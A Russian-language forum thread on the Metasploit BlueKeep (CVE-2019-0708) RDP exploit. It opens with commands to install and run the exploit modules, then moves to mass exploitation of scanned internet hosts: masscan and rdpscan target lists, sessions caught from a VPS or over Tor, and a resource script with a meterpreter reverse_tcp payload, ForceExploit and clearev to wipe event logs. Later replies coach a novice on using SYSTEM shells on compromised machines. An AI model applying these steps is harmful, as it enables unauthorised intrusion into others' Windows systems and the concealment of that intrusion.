Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Ссылка скрыта от гостей

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):

cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!

 

[Shinobi]

Например, у вас есть список из 100 адресов. Запускаете 4 метасплоита в разных окнах (или в screen). В каждом метасплоите обрабатываются 25 адресов. Когда первый метасплоит прошел все 25 адресов, у вас открылось, например, две сессии. Тогда с ними можно работать.

Я делают так: захожу на виртуальный сервер с публичным постоянным IP и оттуда запускаю метасплоит, eth0 = его публичному IP. Либо так: через tor подключаюсь к интернет, получаю публичный адрес и порты открыты (у меня локальный провайдер все порты перекрыл). Правда, так сессий меньше прилетает. Если через виртуалку, то порт должен быть открыт и в виртуалке, и в роутере, и у провайдера. Поэтому лучше это делать через удаленный сервер, где все порты открыты, какие надо, и нет зависимости от провайдера.

спасибо за совет
возможно у меня что то где то корректно не работает

 

[Alois]

спасибо за совет
возможно у меня что то где то корректно не работает

Эти адреса должны иметь открытым 3389 порт -> masscan.

 

[Shinobi]

да, я сначала через masscan
потом rdpscan

после просто grep got ips.txt =)


но пока успехов ноль)

 

[Alois]

да, я сначала через masscan
потом rdpscan

после просто grep got ips.txt =)


но пока успехов ноль)

Я использую auxiliary bluekeep из metasploit.

 

[hellotester]

Пробив у всего это "тракора" минимальный но и он тоже радует безусловно, у меня так же стоит открытый вопрос кто игрался со значениями vmware hyper-v ... etc, у кого какие были результаты?

 

[zhe_ka]

На гитхабе не знаю. Мой выглядит примерно так:

msfconsole.rc
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS file:xxx
set ForceExploit true
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 4444
set VERBOSE true
set AutoRunScript /root/.msf4/meterpreter.rc
set GROOMSIZE 250

meterpreter.rc
getsystem
ps
clearev
background

Извините, можете мне объяснить несколько моментов?
Для чего у вас PAYLOAD windows/x64/meterpreter/reverse_tcp если по умолчанию используется generic/shell_reverse_tcp ?
Зачем в скрипте команда getsystem если сессия и так прилетает от имени системы?

 

[Alois]

Извините, можете мне объяснить несколько моментов?
Для чего у вас PAYLOAD windows/x64/meterpreter/reverse_tcp если по умолчанию используется generic/shell_reverse_tcp ?
Зачем в скрипте команда getsystem если сессия и так прилетает от имени системы?

Метерпретер более функционален и его советуют на многих сайтах. getsystem можно конечно убрать, это привычка с самого начала. Вы правы.

Как вариант, можно попробовать generic/shell_reverse_tcp, может быть, чаще сессия будет открываться.

 

[Shinobi]

Через dns noip можно ловить сессию?

 

[Alois]

Через dns noip можно ловить сессию?

Можно.

 

[Дмитрий Собянин]

На гитхабе не знаю. Мой выглядит примерно так:

msfconsole.rc
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS file:xxx
set ForceExploit true
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 4444
set VERBOSE true
set AutoRunScript /root/.msf4/meterpreter.rc
set GROOMSIZE 250

meterpreter.rc
getsystem
ps
clearev
background

Подскажите , за что отвечают функции :
set ForceExploit true
set VERBOSE true

 

[Alois]

Подскажите , за что отвечают функции :
set ForceExploit true
set VERBOSE true

VERBOSE true дает больше информации о ходе взлома.
Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override. Это нужно, чтобы эксплоит работал, а не прекращался с ошибкой.

 

[Дмитрий Собянин]

VERBOSE true дает больше информации о ходе взлома.
Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override. Это нужно, чтобы эксплоит работал, а не прекращался с ошибкой.

Подскажите , сессия поднимается . Shell coздаёться. А что делать дальше , я не знаю ))))))

 

[Alois]

Подскажите , сессия поднимается . Shell coздаёться. А что делать дальше , я не знаю ))))))Посмотреть вложение 40893

set payload windows/x64/meterpreter/reverse_tcp
Попробуйте вот этот пейлоуд. Если сессия откроется, то вы попадете в
meterpreter, там введите help. Если сессия в фоне, то sessions -i номер сессии. Его узнаете через команду sessions.
В Armitage у вас компьютер будет выделен другим цветом, если он реально будет взломан.

 

[Дмитрий Собянин]

set payload windows/x64/meterpreter/reverse_tcp
Попробуйте вот этот пейлоуд. Если сессия откроется, то вы попадете в
meterpreter, там введите help. Если сессия в фоне, то sessions -i номер сессии. Его узнаете через команду sessions.

Я пишу sessions -i номер сессии . Он мне пишет что сессия открыта с пейлоадом. И на этом всё. Что дальше мне делать ХЗ.(((

 

[Alois]

Я пишу sessions -i номер сессии . Он мне пишет что сессия открыта с пейлоадом. И на этом всё. Что дальше мне делать ХЗ.(((

Дальше введите help

 

[Дмитрий Собянин]

Дальше введите help

Подскажите, а есть команды создать RDP подключения для себя. ????

 

[Alois]

Подскажите, а есть команды создать RDP подключения для себя. ????

Есть, но в meterpreter

 

[Дмитрий Собянин]

Есть, но в meterpreter

блин а что тогда в shell я могу реализовать ????

 

[Alois]

блин а что тогда в shell я могу реализовать ????

Там мало команд. Upload, download, еще что-то.

 

[zhe_ka]

Там мало команд. Upload, download, еще что-то.

Вам мало командной сроки от имени система?